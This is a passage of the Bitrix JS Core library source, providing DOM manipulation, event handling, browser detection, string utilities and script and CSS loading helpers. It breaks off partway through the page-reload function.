/**********************************************************************/
/*********** Bitrix JS Core library ver 0.9.0 beta ********************/
/**********************************************************************/

(function(window){
if (window.BX) return;


var BX = function(node, bCache)
{
	if (BX.type.isNotEmptyString(node))
	{
		var ob;

		if (!!bCache && null != NODECACHE[node]) ob = NODECACHE[node];
		ob = ob || document.getElementById(node);
		if (!!bCache) NODECACHE[node] = ob;

		return ob;
	}
	else if (BX.type.isDomNode(node))
		return node;
	else if (BX.type.isFunction(node))
		return BX.ready(node);

	return null;
},

/* language messages */
MESS = {},

/* ready */
__readyHandler = null,
readyBound = false,
readyList = [],

/* list of registered proxy functions */
proxyId = 1,
proxyList = [],

/* getElementById cache */
NODECACHE = {},

/* List of denied event handlers */
deniedEvents = [],

/* list of registered event handlers */
eventsList = [],

/* list of registered custom events */
customEvents = {},

/* list of external garbage collectors */
garbageCollectors = [],

/* browser detection */
bOpera = navigator.userAgent.toLowerCase().indexOf('opera') != -1,
bSafari = navigator.userAgent.toLowerCase().indexOf('webkit') != -1,
bIE = document.attachEvent && !bOpera,

/* regexps */
r = {
	script: /<script([^>]*)>/i,
	script_src: /src=["\']([^"\']+)["\']/i,
	space: /\s+/,
	ltrim: /^[\s\r\n]+/g,
	rtrim: /[\s\r\n]+$/g
},

lastWait = [];

BX.ext = function(ob) {for (var i in ob) this[i] = ob[i];}

/* OO emulation utility */
BX.extend = function(child, parent)
{
	var f = function() {};
	f.prototype = parent.prototype;
	child.prototype = new f();
	child.prototype.constructor = child;
	child.superclass = parent.prototype;
}

BX.is_subclass_of = function(ob, parent_class)
{
	if (ob instanceof parent_class)
		return true;

	if (parent_class.superclass)
		return BX.is_subclass_of(ob, parent_class.superclass);

	return false;
}

// language utility
BX.message = function(mess)
{
	if (BX.type.isString(mess))
		return MESS[mess];
	else
	{
		for (var i in mess)
		{
			MESS[i] = mess[i];
		}
		return true;
	}
}

BX.bitrix_sessid = function() {return MESS.bitrix_sessid;}

/* DOM manipulation */
BX.create = function(tag, data, context)
{
	context = context || document;

	if (null == data && typeof tag == 'object' && tag.constructor !== String)
	{
		data = tag; tag = tag.tag;
	}

	var elem;
	if (BX.browser.IsIE() && !BX.browser.IsIE9() && null != data && null != data.props && (data.props.name || data.props.id))
	{
		elem = context.createElement('<' + tag + (data.props.name ? ' name="' + data.props.name + '"' : '') + (data.props.id ? ' id="' + data.props.id + '"' : '') + '>');
	}
	else
	{
		elem = context.createElement(tag);
	}

	return data ? BX.adjust(elem, data) : elem;
}

BX.adjust = function(elem, data)
{
	var j,len;

	if (!elem.nodeType)
		return null;

	if (elem.nodeType == 9)
		elem = elem.body;

	if (data.attrs)
	{
		for (j in data.attrs)
		{
			if (j == 'class' || j == 'className')
				elem.className = data.attrs[j];
			else if(data.attrs[j] == "")
				elem.removeAttribute(j);
			else
				elem.setAttribute(j, data.attrs[j]);
		}
	}

	if (data.style)
	{
		for (j in data.style)
			elem.style[j] = data.style[j];
	}

	if (data.props)
	{
		for (j in data.props)
			elem[j] = data.props[j];
	}

	if (data.events)
	{
		for (j in data.events)
			BX.bind(elem, j, data.events[j]);
	}

	if (data.children && data.children.length > 0)
	{
		for (j=0,len=data.children.length; j<len; j++)
		{
			if (BX.type.isNotEmptyString(data.children[j]))
				elem.innerHTML += data.children[j];
			else if (BX.type.isElementNode(data.children[j]))
				elem.appendChild(data.children[j]);
		}
	}
	else if (data.text)
	{
		BX.cleanNode(elem);
		elem.appendChild((elem.ownerDocument || document).createTextNode(data.text));
	}
	else if (data.html)
	{
		elem.innerHTML = data.html;
	}

	return elem;
}

BX.remove = function(ob)
{
	if (null != ob.parentNode)
		ob.parentNode.removeChild(ob);
	ob = null;
	return null;
}

BX.cleanNode = function(node, bSuicide)
{
	node = BX(node);
	bSuicide = !!bSuicide;

	if (node && node.childNodes)
	{
		while(node.childNodes.length > 0)
			node.removeChild(node.firstChild);
	}

	if (bSuicide)
	{
		node = BX.remove(node);
	}

	return node;
}

BX.addClass = function(ob, value)
{
	var classNames;
	ob = BX(ob)

	if (ob)
	{
		if (!ob.className)
		{
			ob.className = value
		}
		else
		{
			classNames = (value || "").split(r.space);

			var className = " " + ob.className + " ";
			for (var j = 0, cl = classNames.length; j < cl; j++)
			{
				if (className.indexOf(" " + classNames[j] + " ") < 0)
				{
					ob.className += " " + classNames[j];
				}
			}
		}
	}

	return ob;
}

BX.removeClass = function(ob, value)
{
	ob = BX(ob);
	if (ob)
	{
		if (ob.className)
		{
			if (BX.type.isString(value))
			{
				var classNames = value.split(r.space), className = " " + ob.className + " ";
				for (var j = 0, cl = classNames.length; j < cl; j++)
				{
					className = className.replace(" " + classNames[j] + " ", " ");
				}

				ob.className = BX.util.trim(className);
			}
			else
			{
				ob.className = "";
			}
		}
	}

	return ob;
}

BX.toggleClass = function(ob, value)
{
	var className;
	if (BX.type.isArray(value))
	{
		className = ' ' + ob.className + ' ';
		for (var j = 0, len = value.length; j < len; j++)
		{
			if (BX.hasClass(ob, value[j]))
			{
				className = (' ' + className + ' ').replace(' ' + value[j] + ' ', ' ');
				className += ' ' + value[j >= len-1 ? 0 : j+1];

				j--;
				break;
			}
		}

		if (j == len)
			ob.className += ' ' + value[0];
		else
			ob.className = className;

		ob.className = BX.util.trim(ob.className);
	}
	else if (BX.type.isNotEmptyString(value))
	{
		className = ob.className;
		if (BX.hasClass(ob, value))
		{
			className = (' ' + className + ' ').replace(' ' + value + ' ', ' ');
		}
		else
		{
			className += ' ' + value;
		}

		ob.className = BX.util.trim(className);
	}

	return ob;
}

BX.hasClass = function(el, className)
{
	if (!el.className)
		return false;
	return ((" " + el.className + " ").indexOf(" " + className + " ")) >= 0;
}

BX.hoverEvents = function(el)
{
	if (el)
		return BX.adjust(el, {events: BX.hoverEvents()});
	else
		return {mouseover: BX.hoverEventsHover, mouseout: BX.hoverEventsHout};
}

BX.hoverEventsHover = function(){BX.addClass(this,'bx-hover');this.BXHOVER=true;}
BX.hoverEventsHout = function(){BX.removeClass(this,'bx-hover');this.BXHOVER=false;}

BX.focusEvents = function(el)
{
	if (el)
		return BX.adjust(el, {events: BX.focusEvents()});
	else
		return {mouseover: BX.focusEventsFocus, mouseout: BX.focusEventsBlur};
}

BX.focusEventsFocus = function(){BX.addClass(this,'bx-focus');this.BXFOCUS=true;}
BX.focusEventsBlur = function(){BX.removeClass(this,'bx-focus');this.BXFOCUS=false;}

BX.setUnselectable = function(node)
{
	BX.addClass(node, 'bx-unselectable');
	node.setAttribute('unSelectable', 'on');
}

BX.styleIEPropertyName = function(name)
{
	if (name == 'float')
		name = 'cssFloat';
	else
	{
		var reg = /(\-([a-z]){1})/g;
		if (reg.test(name))
		{
			name = name.replace(reg, function () {return arguments[2].toUpperCase();});
		}
	}
	return name;
}

/* CSS-notation should be used here */
BX.style = function(el, property, value)
{
	if (!BX.type.isElementNode(el))
		return null;

	if (value == null)
	{
		var res;
		if(el.currentStyle)
			res = el.currentStyle[BX.styleIEPropertyName(property)];
		else if(window.getComputedStyle)
			res = BX.GetContext(el).getComputedStyle(el, null).getPropertyValue(property);

		if(!res)
			res = '';
		return res;
	}
	else
	{
		el.style[BX.styleIEPropertyName(property)] = value;
		return el;
	}
}

BX.focus = function(el)
{
	try
	{
		el.focus();
		return true;
	}
	catch (e)
	{
		return false;
	}
}

/*
	params: {
		tagName|tag : 'tagName',
		className|class : 'className',
		attribute : {attribute : value, attribute : value} | attribute | [attribute, attribute....],
		property : {prop: value, prop: value} | prop | [prop, prop]
	}

	all values can be RegExps or strings
*/
BX.findChildren = function(obj, params, recursive)
{
	return BX.findChild(obj, params, recursive, true);
}

BX.findChild = function(obj, params, recursive, get_all)
{
	if(!obj || !obj.childNodes) return null;

	recursive = !!recursive; get_all = !!get_all;

	var n = obj.childNodes.length, result = [];

	for (var j=0; j<n; j++)
	{
		var child = obj.childNodes[j];

		if (_checkNode(child, params))
		{
			if (get_all)
				result.push(child)
			else
				return child;
		}

		if(recursive == true)
		{
			var res = BX.findChild(child, params, recursive, get_all);
			if (res)
			{
				if (get_all)
					result = BX.util.array_merge(result, res);
				else
					return res;
			}
		}
	}

	if (get_all && result.length > 0)
		return result;
	else
		return null;
}

BX.findParent = function(obj, params)
{
	if(!obj)
		return null;

	var o = obj;
	while(o.parentNode)
	{
		var parent = o.parentNode;

		if (_checkNode(parent, params))
			return parent;

		o = parent;
	}
	return null;
}

BX.findNextSibling = function(obj, params)
{
	if(!obj)
		return null;
	var o = obj;
	while(o.nextSibling)
	{
		var sibling = o.nextSibling;
		if (_checkNode(sibling, params))
			return sibling;
		o = sibling;
	}
	return null;
}

BX.findPreviousSibling = function(obj, params)
{
	if(!obj)
		return null;

	var o = obj;
	while(o.previousSibling)
	{
		var sibling = o.previousSibling;
		if(_checkNode(sibling, params))
			return sibling;
		o = sibling;
	}
	return null;
}

BX.clone = function(obj, bCopyObj)
{
	var _obj, i;
	if (bCopyObj !== false)
		bCopyObj = true;

	if (BX.type.isDomNode(obj))
	{
		_obj = obj.cloneNode(bCopyObj);
	}
	else if (typeof obj == 'object')
	{
		if (bCopyObj)
		{
			if (BX.type.isArray(obj))
			{
				_obj = [];
			}
			else
			{
				_obj =  {};
				if (obj.constructor)
				{
					_obj = new obj.constructor();
				}
			}
		}

		for (i in obj)
		{
			if (typeof obj[i] == "object" && bCopyObj)
				_obj[i] = BX.clone(obj[i], bCopyObj);
			else
				_obj[i] = obj[i];
		}
	}
	else
	{
		_obj = obj;
	}

	return _obj;
}


/* events */
BX.bind = function(el, evname, func)
{
	if(el.attachEvent) // IE
	{
		el.attachEvent("on" + evname, BX.proxy(func, el));
	}
	else
	{
		if(el.addEventListener) // Gecko / W3C
			el.addEventListener(evname, func, false);
		else
			el["on" + evname] = func;
	}

	eventsList[eventsList.length] = {'element': el, 'event': evname, 'fn': func};
}

BX.unbind = function(el, evname, func)
{
	if(el.detachEvent) // IE
		el.detachEvent("on" + evname, BX.proxy(func, el));
	else if(el.removeEventListener) // Gecko / W3C
		el.removeEventListener(evname, func, false);
	else
		el["on" + evname] = null;
}

BX.unbindAll = function(el)
{
	for (var i=0,len=eventsList.length; i<len; i++)
	{
		if (eventsList[i] && (null==el || el==eventsList[i].element))
		{
			BX.unbind(eventsList[i].element, eventsList[i].event, eventsList[i].fn);
			eventsList[i] = null;
		}
	}

	if (null==el)
	{
		eventsList = [];
	}
}

BX.proxy_context = null;

BX.delegate = function (func, thisObject)
{
	return function() {
		var cur = BX.proxy_context;
		BX.proxy_context = this;
		var res = func.apply(thisObject, arguments);
		BX.proxy_context = cur;
		return res;
	}
}

BX.proxy = function(func, thisObject)
{
	if (null == thisObject.__proxy_id)
	{
		proxyList[thisObject.__proxy_id = proxyList.length] = {};
	}

	if (null == func.__proxy_id)
		func.__proxy_id = proxyId++;

	if (null == proxyList[thisObject.__proxy_id][func.__proxy_id])
		proxyList[thisObject.__proxy_id][func.__proxy_id] = BX.delegate(func, thisObject);

	return proxyList[thisObject.__proxy_id][func.__proxy_id];
}

BX.False = function() {return false;}
BX.DoNothing = function() {}

// TODO: also check event handlers set via BX.bind()
denyEvent = function(el, ev)
{
	deniedEvents.push([el, ev, el['on' + ev]]);
	el['on' + ev] = BX.DoNothing;
}

BX.allowEvent = function(el, ev)
{
	for(var i=0, len=deniedEvents.length; i<len; i++)
	{
		if (deniedEvents[i][0] == el && deniedEvents[i][1] == ev)
		{
			el['on' + ev] = deniedEvents[i][2];
			BX.util.deleteFromArray(deniedEvents, i);
			return;
		}
	}
}

BX.PreventDefault = function(e)
{
	if(!e) e = window.event;
	if(e.stopPropagation)
	{
		e.preventDefault();
		e.stopPropagation();
	}
	else
	{
		e.cancelBubble = true;
		e.returnValue = false;
	}
	return false;
}

BX.eventReturnFalse = function(e)
{
	e=e||window.event;
	if (e && e.preventDefault) e.preventDefault();
	else e.returnValue = false;
	return false;
}

BX.eventCancelBubble = function(e)
{
	e=e||window.event;
	if(e && e.stopPropagation)
		e.stopPropagation();
	else
		e.cancelBubble = true;
}

/* custom events */
/*
	BX.addCustomEvent(eventObject, eventName, eventHandler) - set custom event handler for particular object
	BX.addCustomEvent(eventName, eventHandler) - set custom event handler for all objects
*/
BX.addCustomEvent = function(eventObject, eventName, eventHandler)
{
	/* shift parameters for short version */
	if (BX.type.isString(eventObject))
	{
		eventHandler = eventName;
		eventName = eventObject;
		eventObject = window;
	}

	eventName = eventName.toUpperCase();

	if (!customEvents[eventName])
		customEvents[eventName] = [];

	customEvents[eventName].push(
		{
			handler: eventHandler,
			obj: eventObject
		}
	);
}

BX.removeCustomEvent = function(eventObject, eventName, eventHandler)
{
	/* shift parameters for short version */
	if (BX.type.isString(eventObject))
	{
		eventHandler = eventName;
		eventName = eventObject;
		eventObject = window;
	}

	eventName = eventName.toUpperCase();

	if (!customEvents[eventName])
		return;

	for (var i = 0, l = customEvents[eventName].length; i < l; i++)
	{
		if (!customEvents[eventName][i])
			continue;
		if (customEvents[eventName][i].handler == eventHandler && customEvents[eventName][i].obj == eventObject)
		{
			delete customEvents[eventName][i];
			return;
		}
	}
}

BX.onCustomEvent = function(eventObject, eventName, arEventParams)
{
	/* shift parameters for short version */
	if (BX.type.isString(eventObject))
	{
		arEventParams = eventName;
		eventName = eventObject;
		eventObject = window;
	}

	eventName = eventName.toUpperCase();

	if (!customEvents[eventName])
		return;

	if (!arEventParams)
		arEventParams = [];

	var h;
	for (var i = 0, l = customEvents[eventName].length; i < l; i++)
	{
		h = customEvents[eventName][i];
		if (!h || !h.handler)
			continue;

		if (h.obj == window || /*eventObject == window || */h.obj == eventObject) //- only global event handlers will be called
		{
			h.handler.apply(eventObject, arEventParams);
		}
	}
}

/* ready */
BX.isReady = false;
BX.ready = function(handler)
{
	bindReady();

	if (BX.isReady)
		handler.call(document);
	else if (readyList)
		readyList.push(handler);
}


/* browser detection */
BX.browser = {
	IsIE: function()
	{
		return bIE;
	},

	IsIE6: function()
	{
		return (/MSIE 6/i.test(navigator.userAgent));
	},

	IsIE9: function()
	{
		return !!document.documentMode && document.documentMode >= 9;
	},

	IsOpera: function()
	{
		return bOpera;
	},

	IsSafari: function()
	{
		return bSafari;
	},

	IsDoctype: function(pDoc)
	{
		pDoc = pDoc || document;

		if (pDoc.compatMode)
			return (pDoc.compatMode == "CSS1Compat");

		if (pDoc.documentElement && pDoc.documentElement.clientHeight)
			return true;

		return false;
	}
}

/* low-level fx funcitons*/
BX.show = function(ob)
{
	if (ob.BXDISPLAY || !_checkDisplay(ob))
	{
		ob.style.display = ob.BXDISPLAY;
	}
}

BX.hide = function(ob)
{
	if (!ob.BXDISPLAY)
		_checkDisplay(ob);

	ob.style.display = 'none';
}

BX.toggle = function(ob, values)
{
	if (!values && BX.isElementNode(ob))
	{
		var bShow = true;
		if (ob.BXDISPLAY)
			bShow = !_checkDisplay(ob);
		else
			bShow = ob.style.display == 'none';

		if (bShow)
			BX.show(ob);
		else
			BX.hide(ob);
	}
	else if (BX.type.isArray(values))
	{
		for (var i=0,len=values.length; i<len; i++)
		{
			if (ob == values[i])
			{
				ob = values[i==len-1 ? 0 : i+1]
				break;
			}
		}
		if (i==len)
			ob = values[0];
	}

	return ob;
}

/* some useful util functions */

BX.util = {
	array_merge: function(first, second)
	{
		if (!BX.type.isArray(first)) first = [];
		if (!BX.type.isArray(second)) second = [];

		var i = first.length, j = 0;

		if (typeof second.length === "number")
		{
			for (var l = second.length; j < l; j++)
			{
				first[i++] = second[j];
			}
		}
		else
		{
			while (second[j] !== undefined)
			{
				first[i++] = second[j++];
			}
		}

		first.length = i;

		return first;
	},

	array_unique: function(ar)
	{
		var i=0,j,len=ar.length;
		if(len<2) return ar;

		for (; i<len-1;i++)
		{
			for (j=i+1; j<len;j++)
			{
				if (ar[i]==ar[j])
				{
					ar.splice(j--,1); len--;
				}
			}
		}

		return ar;
	},

	in_array: function(needle, haystack)
	{
		for(var i=0; i<haystack.length; i++)
		{
			if(haystack[i] == needle)
				return true;
		}
		return false;
	},

	array_search: function(needle, haystack)
	{
		for(var i=0; i<haystack.length; i++)
		{
			if(haystack[i] == needle)
				return i;
		}
		return -1;
	},

	array_values: function(ar)
	{
		if (!BX.type.isArray(ar)) return false;
		var ar1 = [],j=0;
		for (var i=0,len=ar.length; i < len; i++)
		{
			if (null != ar[i]) ar1[j++]=ar[i];
		}
		return ar1;
	},

	trim: function(s)
	{
		if (BX.type.isString(s))
			return s.replace(r.ltrim, '').replace(r.rtrim, '');
		else
			return s;
	},

	urlencode: function(s){return encodeURIComponent(s);},

	// it may also be useful. via sVD.
	deleteFromArray: function(ar, ind) {return ar.slice(0, ind).concat(ar.slice(ind + 1));},
	insertIntoArray: function(ar, ind, el) {return ar.slice(0, ind).concat([el]).concat(ar.slice(ind));},

	htmlspecialchars: function(str)
	{
		if(!str.replace) return str;

		return str.replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
	},

	htmlspecialcharsback: function(str)
	{
		if(!str.replace) return str;

		return str.replace(/\&quot;/g, '"').replace(/&#39;/g, "'").replace(/\&lt;/g, '<').replace(/\&gt;/g, '>').replace(/\&amp;/g, '&');
	},

	// Quote regular expression characters plus an optional character
	preg_quote: function(str, delimiter)
	{
		if(!str.replace)
			return str;
		return str.replace(new RegExp('[.\\\\+*?\\[\\^\\]$(){}=!<>|:\\' + (delimiter || '') + '-]', 'g'), '\\$&');
	},

	jsencode: function(str)
	{
		if (!str || !str.replace)
			return str;

		var escapes =
		[
			{ c: "\\\\", r: "\\\\" }, // should be first
			{ c: "\\t", r: "\\t" },
			{ c: "\\n", r: "\\n" },
			{ c: "\\r", r: "\\r" },
			{ c: "\"", r: "\\\"" },
			{ c: "'", r: "\\'" },
			{ c: "<", r: "\\x3C" },
			{ c: ">", r: "\\x3E" },
			{ c: "\\u2028", r: "\\u2028" },
			{ c: "\\u2029", r: "\\u2029" }
		];
		for (var i = 0; i < escapes.length; i++)
			str = str.replace(new RegExp(escapes[i].c, 'g'), escapes[i].r);
		return str;
	},

	str_pad: function(input, pad_length, pad_string, pad_type)
	{
		pad_string = pad_string || ' ';
		pad_type = pad_type || 'right';
		input = input.toString();

		if (pad_type == 'left')
			return BX.util.str_pad_left(input, pad_length, pad_string);
		else
			return BX.util.str_pad_right(input, pad_length, pad_string);

	},

	str_pad_left: function(input, pad_length, pad_string)
	{
		var i = input.length, q=pad_string.length;
		if (i >= pad_length) return input;

		for(;i<pad_length;i+=q)
			input = pad_string + input;

		return input;
	},

	str_pad_right: function(input, pad_length, pad_string)
	{
		var i = input.length, q=pad_string.length;
		if (i >= pad_length) return input;

		for(;i<pad_length;i+=q)
			input += pad_string;

		return input;
	},

	popup: function(url, width, height)
	{
		var w, h;
		if(BX.browser.IsOpera())
		{
			w = document.body.offsetWidth;
			h = document.body.offsetHeight;
		}
		else
		{
			w = screen.width;
			h = screen.height;
		}
		window.open(url, '', 'status=no,scrollbars=yes,resizable=yes,width='+width+',height='+height+',top='+Math.floor((h - height)/2-14)+',left='+Math.floor((w - width)/2-5));
	}
}

BX.type = {
	isString: function(item) {
		return typeof (item) == "string" || item instanceof String;
	},
	isNotEmptyString: function(item) {
		return typeof (item) == "string" || item instanceof String ? item.length > 0 : false;
	},
	isBoolean: function(item) {
		return typeof (item) == "boolean" || item instanceof Boolean;
	},
	isNumber: function(item) {
		return typeof (item) == "number" || item instanceof Number;
	},
	isFunction: function(item) {
		return typeof (item) == "function" || item instanceof Function;
	},
	isElementNode: function(item) {
		return item && typeof (item) == "object" && "nodeType" in item && item.nodeType == 1; //document.body.ELEMENT_NODE;
	},
	isDomNode: function(item) {
		return item && typeof (item) == "object" && "nodeType" in item;
	},
	isArray: function(item) {
		return typeof (item) == 'array' || item instanceof Array;
	}
}

BX.evalGlobal = function(data)
{
	if (data)
	{
		var head = document.getElementsByTagName("head")[0] || document.documentElement,
			script = document.createElement("script");

		script.type = "text/javascript";

		if (!BX.browser.IsIE())
		{
			script.appendChild(document.createTextNode(data));
		}
		else
		{
			script.text = data;
		}

		head.insertBefore(script, head.firstChild);
		head.removeChild(script);
	}
}

BX.processHTML = function(HTML, scriptsRunFirst)
{
	var matchScript, scripts = [], data = HTML;

	while ((matchScript = data.match(r.script)) !== null)
	{
		var end = data.search('<\/script>', 'i');
		if (end == -1)
			break;

		var bRunFirst = scriptsRunFirst || (matchScript[1].indexOf('bxrunfirst') != '-1');

		var matchSrc;
		if ((matchSrc = matchScript[1].match(r.script_src)) !== null)
			scripts.push({"bRunFirst": bRunFirst, "isInternal": false, "JS": matchSrc[1]});
		else
		{
			var start = matchScript.index + matchScript[0].length;
			var js = data.substr(start, end-start);

			scripts.push({"bRunFirst": bRunFirst, "isInternal": true, "JS": js});
		}

		data = data.substr(0, matchScript.index) + data.substr(end+9);
	}

	return {'HTML': data, 'SCRIPT': scripts};
}

BX.garbage = function(call, thisObject)
{
	garbageCollectors.push({callback: call, context: thisObject});
}

/* window pos functions */

BX.GetDocElement = function (pDoc)
{
	pDoc = pDoc || document;
	return (BX.browser.IsDoctype(pDoc) ? pDoc.documentElement : pDoc.body);
}

BX.GetContext = function(node)
{
	if (BX.type.isElementNode(node))
		return node.ownerDocument.parentWindow || node.ownerDocument.defaultView || window;
	else if (BX.type.isDomNode(node))
		return node.parentWindow || node.defaultView || window;
	else
		return window;
}

BX.GetWindowInnerSize = function(pDoc)
{
	var width, height;

	pDoc = pDoc || document;

	if (self.innerHeight) // all except Explorer
	{
		width = BX.GetContext(pDoc).innerWidth;
		height = BX.GetContext(pDoc).innerHeight;
	}
	else if (pDoc.documentElement && (pDoc.documentElement.clientHeight || pDoc.documentElement.clientWidth)) // Explorer 6 Strict Mode
	{
		width = pDoc.documentElement.clientWidth;
		height = pDoc.documentElement.clientHeight;
	}
	else if (pDoc.body) // other Explorers
	{
		width = pDoc.body.clientWidth;
		height = pDoc.body.clientHeight;
	}
	return {innerWidth : width, innerHeight : height};
}

BX.GetWindowScrollPos = function(pDoc)
{
	var left, top;

	pDoc = pDoc || document;

	if (self.pageYOffset) // all except Explorer
	{
		left = BX.GetContext(pDoc).pageXOffset;
		top = BX.GetContext(pDoc).pageYOffset;
	}
	else if (pDoc.documentElement && (pDoc.documentElement.scrollTop || pDoc.documentElement.scrollLeft)) // Explorer 6 Strict
	{
		left = pDoc.documentElement.scrollLeft;
		top = pDoc.documentElement.scrollTop;
	}
	else if (pDoc.body) // all other Explorers
	{
		left = pDoc.body.scrollLeft;
		top = pDoc.body.scrollTop;
	}
	return {scrollLeft : left, scrollTop : top};
}

BX.GetWindowScrollSize = function(pDoc)
{
	var width, height;
	if (!pDoc)
		pDoc = document;

	if ( (pDoc.compatMode && pDoc.compatMode == "CSS1Compat"))
	{
		width = pDoc.documentElement.scrollWidth;
		height = pDoc.documentElement.scrollHeight;
	}
	else
	{
		if (pDoc.body.scrollHeight > pDoc.body.offsetHeight)
			height = pDoc.body.scrollHeight;
		else
			height = pDoc.body.offsetHeight;

		if (pDoc.body.scrollWidth > pDoc.body.offsetWidth ||
			(pDoc.compatMode && pDoc.compatMode == "BackCompat") ||
			(pDoc.documentElement && !pDoc.documentElement.clientWidth)
		)
			width = pDoc.body.scrollWidth;
		else
			width = pDoc.body.offsetWidth;
	}
	return {scrollWidth : width, scrollHeight : height};
}

BX.GetWindowSize = function(pDoc)
{
	var innerSize = this.GetWindowInnerSize(pDoc);
	var scrollPos = this.GetWindowScrollPos(pDoc);
	var scrollSize = this.GetWindowScrollSize(pDoc);

	return  {
		innerWidth : innerSize.innerWidth, innerHeight : innerSize.innerHeight,
		scrollLeft : scrollPos.scrollLeft, scrollTop : scrollPos.scrollTop,
		scrollWidth : scrollSize.scrollWidth, scrollHeight : scrollSize.scrollHeight
	};
}

BX.is_relative = function(el)
{
	var p = BX.style(el, 'position');
	return p == 'relative' || p == 'absolute';
}

BX.is_float = function(el)
{
	var p = BX.style(el, 'float');
	return p == 'right' || p == 'left';
}

BX.pos = function(el, bRelative)
{
	var r = { top: 0, right: 0, bottom: 0, left: 0, width: 0, height: 0 };
	bRelative = !!bRelative;
	if (!el)
		return r;
	if (typeof (el.getBoundingClientRect) != "undefined" && el.ownerDocument == document && !bRelative)
	{
		var clientRect = el.getBoundingClientRect();
		var root = document.documentElement;
		var body = document.body;

		r.top = clientRect.top + root.scrollTop + body.scrollTop;
		r.left = clientRect.left + root.scrollLeft + body.scrollLeft;
		r.width = clientRect.right - clientRect.left;
		r.height = clientRect.bottom - clientRect.top;
		r.right = clientRect.right + root.scrollLeft + body.scrollLeft;
		r.bottom = clientRect.bottom + root.scrollTop + body.scrollTop;
	}
	else
	{
		var x = 0, y = 0, w = el.offsetWidth, h = el.offsetHeight;
		var first = true;
		for (; el != null; el = el.offsetParent)
		{
			if (!first && bRelative && BX.is_relative(el))
				break;

			x += el.offsetLeft;
			y += el.offsetTop;
			if (first)
			{
				first = false;
				continue;
			}

			var elBorderLeftWidth = parseInt(BX.style(el, 'border-left-width')),
				elBorderTopWidth = parseInt(BX.style(el, 'border-top-width'));

			if (!isNaN(elBorderLeftWidth) && elBorderLeftWidth > 0)
				x += elBorderLeftWidth;
			if (!isNaN(elBorderTopWidth) && elBorderTopWidth > 0)
				y += elBorderTopWidth;
		}

		r.top = y;
		r.left = x;
		r.width = w;
		r.height = h;
		r.right = r.left + w;
		r.bottom = r.top + h;
	}

	for (var i in r) r[i] = parseInt(r[i]);

	return r;
}

BX.align = function(pos, w, h)
{
	var pDoc = document;
	if (BX.type.isElementNode(pos))
	{
		pDoc = pos.ownerDocument;
		pos = BX.pos(pos);
	}

	var x = pos["left"], y = pos["bottom"];

	var scroll = BX.GetWindowScrollPos(pDoc);
	var size = BX.GetWindowInnerSize(pDoc);

	if((size.innerWidth + scroll.scrollLeft) - (pos["left"] + w) < 0)
	{
		if(pos["right"] - w >= 0 )
			x = pos["right"] - w;
		else
			x = scroll.scrollLeft;
	}

	if((size.innerHeight + scroll.scrollTop) - (pos["bottom"] + h) < 0)
	{
		if(pos["top"] - h >= 0)
			y = pos["top"] - h;
		else
			y = scroll.scrollTop;
	}

	return {'left':x, 'top':y};
}

/* non-xhr loadings */
BX.showWait = function(node, msg)
{
	node = BX(node) || document.body || document.documentElement;
	msg = msg || BX.message('JS_CORE_LOADING');

	var container_id = node.id || Math.random();

	var obMsg = node.bxmsg = document.body.appendChild(BX.create('DIV', {
		props: {
			id: 'wait_' + container_id,
			className: 'bx-core-waitwindow'
		},
		text: msg
	}));

	setTimeout(BX.delegate(_adjustWait, node), 10);

	lastWait[lastWait.length] = obMsg;
	return obMsg;
}

BX.closeWait = function(node, obMsg)
{
	obMsg = obMsg || node && (node.bxmsg || BX('wait_' + node.id)) || lastWait.pop();
	if (obMsg && obMsg.parentNode)
	{
		for (var i=0,len=lastWait.length;i<len;i++)
		{
			if (obMsg == lastWait[i])
			{
				lastWait = BX.util.deleteFromArray(lastWait, i);
				break;
			}
		}

		obMsg.parentNode.removeChild(obMsg);
		if (node) node.bxmsg = null;
		BX.cleanNode(obMsg, true);
	}
}

BX.loadScript = function(script, callback, doc)
{
	if (!BX.isReady)
	{
		var _args = arguments;
		BX.ready(function() {
			BX.loadScript.apply(this, _args);
		});
		return;
	}

	doc = doc || document;

	if (BX.type.isString(script))
		script = [script];
	var _callback = function()
	{
		return (callback && BX.type.isFunction(callback)) ? callback() : null
	}
	var load_js = function(ind)
	{
		if (ind >= script.length)
			return _callback();

		var oHead = doc.getElementsByTagName("head")[0] || doc.documentElement;
		var oScript = doc.createElement('script');
		oScript.src = script[ind];

		var bLoaded = false;
		oScript.onload = oScript.onreadystatechange = function()
		{
			if (!bLoaded && (!oScript.readyState || oScript.readyState == "loaded" || oScript.readyState == "complete"))
			{
				bLoaded = true;
				setTimeout(function (){load_js(++ind);}, 50);

				oScript.onload = oScript.onreadystatechange = null;
				if (oHead && oScript.parentNode)
				{
					oHead.removeChild(oScript);
				}
			}
		}

		return oHead.insertBefore(oScript, oHead.firstChild);
	}

	load_js(0);
}

BX.loadCSS = function(arCSS, doc, win)
{
	if (!BX.isReady)
	{
		var _args = arguments;
		BX.ready(function() {
			BX.loadCSS.apply(this, _args);
		});
		return null;
	}

	if (BX.type.isString(arCSS))
	{
		var bSingle = true;
		arCSS = [arCSS];
	}
	var i, l = arCSS.length, pLnk = [];

	if (l == 0)
		return null;

	doc = doc || document;
	win = win ||window;

	if (!win.bxhead)
	{
		var heads = doc.getElementsByTagName('HEAD');
		win.bxhead = heads[0];
	}

	if (!win.bxhead)
		return null;

	for (i = 0; i < l; i++)
	{
		var lnk = document.createElement('LINK');
		lnk.href = arCSS[i];
		lnk.rel = 'stylesheet';
		lnk.type = 'text/css';
		win.bxhead.appendChild(lnk);
		pLnk.push(lnk);
	}

	if (bSingle)
		return lnk;

	return pLnk;
}

BX.reload = function(back_url, bAddClearCache)
{
	if (back_url === true)
	{
		bAddClearCache = true;
		back_url = null;
	}

	var new_href = back_url || top.location.href;

	var hashpos = new_href.indexOf('#'), hash = '';

	if (hashpos != -1)
	{
		hash = new_href.substr(hashpos);
		new_href = new_href.substr(0, hashpos);
	}

	if (bAddClearCache && new_href.indexOf('clear_cache=Y') < 0)
		new_href += (new_href.indexOf('?') == -1 ? '?' : '&') + 'clear_cache=Y';

	if (hash)
	{
		// hack for clearing cache in ajax mode components with history emulation
		if (bAddClearCache && (hash.substr(0, 5) == 'view/' || hash.substr(0, 6) == '#view/') && hash.indexOf('clear_cache%3DY') < 0)
			hash += (hash.indexOf('%3F') == -1 ? '%3F' : '%26') + 'clear_cache%3DY'

		new_href = new_href.replace(/(\?|\&)_r=[\d]*/, '');
		new_href += (new_href.indexOf('?') == -1 ? '?' : '&') + '_r='+Math.round(Math.random()*10000) + hash;
	}

